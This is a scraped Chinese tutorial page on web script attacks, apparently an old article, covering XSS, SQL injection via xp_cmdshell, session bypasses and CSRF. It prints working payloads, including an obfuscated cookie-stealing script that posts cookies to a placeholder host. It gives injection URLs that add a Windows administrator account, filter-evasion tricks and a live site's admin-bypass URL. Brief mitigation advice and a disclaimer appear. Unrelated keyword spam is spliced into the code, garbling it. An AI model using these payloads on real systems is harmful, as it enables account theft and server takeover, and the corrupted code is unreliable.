后端开发|php教程,利用,安全,脚本,我们,可以,过滤,一个,攻击,修改,SQ后端开发-php教程最近脚本攻击好象是很流行的,不过早在很久前就有这个了!脚本攻击严格的说应该是一件 后端开发
后端开发|php教程,利用,安全,脚本,我们,可以,过滤,一个,攻击,修改,SQ后端开发-php教程最近脚本攻击好象是很流行的,不过早在很久前就有这个了!脚本攻击严格的说应该是一件 后端开发|php教程
,利用,安全,脚本,我们,可以,过滤,一个,攻击,修改,SQ 后端开发-php教程最近脚本攻击好象是很流行的,不过早在很久前就有这个了!脚本攻击严格的说应该是一件艺术而不是漏洞!首先我们先要知道什么是脚本,脚本就是运行在网页服务器上的文本程序,例如:ASP、PHP、CGI、JSP、ISAP等等,脚本的攻击就是利用这些文件的设置和编写时的错误或者疏忽不当,攻击者就可以利用这些来达到自己攻击目的,如果一个服务器存在这些漏洞,那么它的沦陷也是时间的问题! 这些文本文件一般都是要结合数据库来使用的,这些数据库有ACCESS、MSSQL、MYSQL、Oracle等!脚本攻击就是针对这些数据库来配合脚本对一些变量的过滤不严的问题来达到得到用户密码等敏感信息,修改数据库等目的!下面我就针对这些来分别举例说明! A、跨站脚本的攻击 脚本的跨站(CSS/XSS)就是利用程序对用户提交的变量不严,大多数是利用多媒体标签,前段时间比较流行的flash跨站就是利用的这个,比如我在[FLASH=450,350][/FLASH]之间插入一个我自己作好的一个swf文件,swf文件里我们用geturl里加上Javascript:window.open(‘_blank>http://qfaq.yeah.net’)就可以让他打开清风安全网的网站,如果这里是一个木马网页,呵呵,,,你就等着中木马吧!还有就是窃取用户的COOKIE,例如我们利用[IMG][/IMG]也就是图片的跨站,在这个里面插入 window.open(‘_blank>http://xxx/xxx.asp?msg=’+documents.COOKIE)这段地址即可得到!如果将Javascript过滤掉后怎么办? 好,我们在看看下面这段代码: [upload=swf]uploadImages/200310812145390577.swf?”>aa=”var”+unescape(“%20”)+”dat;dat=escape(document.COOKIE);var”+unescape(“%20”)+”http=new”+unescape(“%20”)+”ActiveXObject(‘Microsoft.XMLHTTP’);ht”+”tp.open”+unescape(“%20″)+”(‘POST’,’ht’+’tp://xxx/bbs/usersms.asp?action=sendhttp.send();”;eval(aa)[/upload] 怎么样,还是能将你的信息得到的,而且还不会弹出对话框! 另外在joekoe论坛程序里还有一个这样的问题,比如你发个帖子里有[DIR][/DIR]就会弹出一个播放器的安装程序,呵呵,如果是一个黑心的站长利用这个来放马,那后果就不用说了吧! 解决办法:现在还没有好的方法解决这个问题,你要做的就是将多媒体的标签删掉! 另附ASP和PHP的跨站代码 php如下 响应式网址导航源码,vscode内置gcc吗,ubuntu 图形设置,jdk与tomcat对应,confluence爬虫,php加盐,东莞seo优化公司引流,外贸购物网站php源码,dedecms含数据模板lzw document.location=”_blank>http://”; 微擎 微赞源码 模块,ubuntu限制cpu功率,tomcat虚拟机起不来,快手自动爬虫,php用什么方法复制excel,新界seo优化lzwasp如下 <% testfile=Server.MapPath(“COOKIEs.txt”) msg=Request(“msg”) set fs=server.CreateObject(“scripting.filesystemobject”) set thisfile=fs.OpenTextFile(testfile,8,True,0) thisfile.WriteLine(“”exec master.dbo.xp_cmdshell ‘net user xuehan ilovexuehan /add’;– _blank>http://XXX/show.asp?id=1;exec master.dbo.xp_cmdshell ‘net localgroup administrators xuehan /add’;– 看到了吗?我们已经在系统中田加了一个xuehan 密码是ilovexuehan的管理员帐号,以下的事情你就自己来做吧,呵呵,,,不用我来教了吧!!! 如果过滤了分号和单引号怎么办?呵呵,我们只要将我们的命令形式转换一下,比如我们转换成十六进制或者别的形式就可以继续注入了,还有就是他如果过滤了xp_cmdshell 我们也可以解决,我们可以写成xp’+’_cmd’+’shell形式,如果他将xp_cmdshell 扩展删掉,我们可以通过xplog70.dll文件来恢复,呵呵,,,具体自己查找下数据库的知识,当然我们也可以用别的扩展!所以说SQL injection不仅仅是一门技术,更要有灵活的头脑和扎实的数据库知识,特别是对SQL语言的掌握程度,如果不会SQL语言,你永远都是生搬硬套,遇到障碍就过不去了! 3、PHP+MYSQL数据库类型 PHP+MYSQL一直以来都认为是最安全的组合,不过一些文件没有过滤单引号、反斜线等,我们也可以来进行注入,不过在最新的php安装程序里的php.ini文件默认都是对这些过滤掉的,所以很大情况下我们是无法对进行注入的,不过也有许多牛人们可以饶过这个限制的!由于我的PHP和MYSQL不是太懂,所以就不能来具体举例来说明了,大家要是有兴趣可以去找写资料来看!!! 需要从根本上解决解决SQL Injection问题。还得从程序本身入手。过滤不能单纯的过滤URL所提交的参数,在表单里的也要过滤,value=后面的可以修改的数据,修改后可以提交到服务器,总之对所有的表单提交的数据以及用户可能对HTML源文件进行修改来控制的所有来自Web服务器外部的数据进行过滤或转换,对单引号、双引号、分号“–”还有对数字键上面的所有特殊字符进行过滤,还有QUERY_STRING环境变量。在服务器上删除一些危险的扩展存储过程,比如xp_cmdshell。有条件装个IDS更好,不敢说无坚不摧,但至少可以阻挡大部分攻击者。 C、一些别的脚本攻击 有些程序没有对COOKIE或者session进行过滤和检查,就造成了用户可以非法修改提交页面,自己提交修改数据,比如像海阳顶端网木马的以前版本对session没有过滤,我们就可以饶过密码的验证来到达真正的页面,还有就是post提交的问题,像leadbbs的2.77版本就是没有充分的过滤,我们就可以把管理员的密码修改成自己的密码! 还有一个脚本的攻击例子,在Discuz! 2.0 论坛里,因为个人属性缺乏必要的安全确认,所以很容易诱使其他会员自动修改其个人属性内容,特别是注册邮件信息,这关系着登陆密码的修改。 比如我们发个帖子,写上 function postemail() { document.reg.submit(); }
http://xxx/memcp.php?action=profile”; name=”reg”>
诱使会员点击这个页面后,就会自动修改该会员注册的email地址为crack.x.h2163.com。当然为了隐蔽性,可以更新后自动关闭,然后调用另外一个假地址。 当然我们也可以利用这个漏洞进行欺骗、隐藏来诱惑管理员来修改我们为管理员等等!大家自己去学习吧! 看了这么多枯燥的东西下面我们再来看看另外一个好玩的漏洞,在百渡里搜索”传奇留言薄“找几个免费的留言本进去,找到他的登陆页面,我找到的一个是: _blank>http://www.conanshome.com/guestbook/login.asp 我们再来看看下面这个连接: _blank>http://www.conanshome.com/guestbook/admin.asp?adminid=admin 哈,怎么我们就闯入后台了!!! 什么原因,自己去琢磨吧! 后记:脚本的攻击可以说是防不胜防的,我们所要做的只能是提高编写程序的严谨态度,人为的因素在脚本攻击中是最重要的! 声明:本文提到的漏洞都有一定的攻击性,我们的目的是探讨技术,搞破坏的是小人!所造成的一切后果于作者无关!由于作者水平有限,文中难免有错误之处,欢迎指出!
【感谢龙石为本站提供
api接口平台 http://www.longshidata.com/pages/apigateway.html】